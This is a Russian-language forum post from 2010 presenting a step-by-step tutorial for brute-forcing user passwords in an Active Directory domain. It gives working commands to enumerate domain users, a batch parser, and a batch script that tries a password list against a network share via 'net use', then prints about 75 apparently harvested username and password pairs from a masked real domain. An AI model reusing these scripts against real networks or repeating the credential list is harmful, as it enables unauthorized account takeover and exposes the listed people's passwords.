Брутфорс в Active Directory

Discussion in 'Песочница' started by sXaNeR, 21 Apr 2010.

  1. sXaNeR

    sXaNeR New Member

    Joined:
    16 Apr 2010
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Это моя первая статья , прошу не ругать.

    В этой статье приведу пример брутфорса паролей обычных пользователей в домене, построенном на Active Directory (Windows Server 2003). Весь материал практический и проверен на приведённом примере.

    1.Получаем в консоли список пользователей AD :
    cmd> net user /domain >> username.txt

    2.Получился файл username.txt вида :
    __vmware_user__ aaii ababkovaeg
    abaevalu abashevaia abdrahimovalm
    abdrahimovaod abdrakhmanovadr abdrakhmanovaik
    abdrakhmanovds abdulinalr abdulinma
    abdulkarimovavk abdullinaa abdullinagr
    abdullinalr abdullinayur abdullinma
    abdulmanovpsh abdulovasv abdulovavb

    3.Сделаем для простоты файл user.txt c именами пользователей в 1 столбик:
    1)создадим Bat-файл parser.bat :
    @for /f "tokens=1,2,3*" %%i in (username.txt) do (@echo %%i >>user.txt)&(@echo %%j >>user.txt)&(@echo %%k >> user.txt)
    2) запускаем и ждём окончания.

    4.Создаем файл паролей pass.txt с паролями в 1 столбик по одному,например :
    11111111
    12345678

    5.Создаём Bat-файл brut.bat :
    for /f %%i in (user.txt) do for /f %%j in (pass.txt) do (net use r: \\w300\foto %%j /user:****.ru\%%i /persistent:yes)&&(echo %%i;%%j>>success.txt)&&(net use r: /delete)

    P.S: r: -временный несуществующий диск
    \\w300\foto - любая существующая сетевая папка
    ****.ru - домен с AD

    6. Запускаем brut.bat и ждём

    7. По окончанию получен файл success.txt вида логин;пароль :

    ahatovms;12345678
    alehinasyu;11111111
    batueveev;11111111
    bikbulatovala;11111111
    bochkovae;12345678
    bogdanovama;12345678
    bondarenkolp;11111111
    boss;12345678
    chudinoven;11111111
    dyadkovatv;11111111
    efremovas;12345678
    gafurivann;11111111
    gunbinana;12345678
    ifepo;11111111
    ifepoe;11111111
    izjurovaa;12345678
    jkmuf;11111111
    kashiginaas;11111111
    konovalovana;11111111
    konyaevaea;12345678
    korgakovasv;12345678
    kostarevaam;11111111
    kosyyie;12345678
    kozevnikovald;11111111
    kuksovalv;11111111
    kursi;11111111
    labeikinas;12345678
    litkesg;11111111
    lupanovaiv;11111111
    lyashenkoyuv;11111111
    martynovakju;12345678
    maryaninovna;11111111
    matrosds;11111111
    mosienkomu;12345678
    moskalenkooa;12345678
    mudrakln;11111111
    nikonovadr;12345678
    ntuser;11111111
    ognevayamm;11111111
    olimpinf;11111111
    omarovaka;12345678
    paryshevaae;12345678
    pesinla;11111111
    pivchenkoea;12345678
    plotnikovaev2;aaaaaaaa
    poletaevsn;12345678
    popovsm;12345678
    portnovab;11111111
    pozdnyakovaep;12345678
    pozhnikovaas;12345678
    pu-85;11111111
    pyatnitskiyas;11111111
    ReslerLA;12345678
    safronovas;11111111
    shankovskihea;11111111
    shaysultanovaoa;11111111
    shefersv;11111111
    shhukinaia;12345678
    shkiravp;12345678
    shvarevaia;11111111
    sibagatulinnaai;12345678
    stafeevams;11111111
    tatarinovam;11111111
    team3;11111111
    tolkachevaev;11111111
    trenkleee;11111111
    troyanoviv;12345678
    turovecgv;12345678
    u1;11111111
    u2;11111111
    u4;11111111
    u5;11111111
    uit_pochta;11111111
    volozeninanb;11111111
    yashinama;12345678
    zaharovavm;11111111

    8.Чтобы просмотреть права пользователя вводим :
    cmd> net user имя_пользователя@****.ru // или ваш домен



    Спасибо за внимание!
     
    #1 sXaNeR, 21 Apr 2010
    Last edited: 29 Apr 2010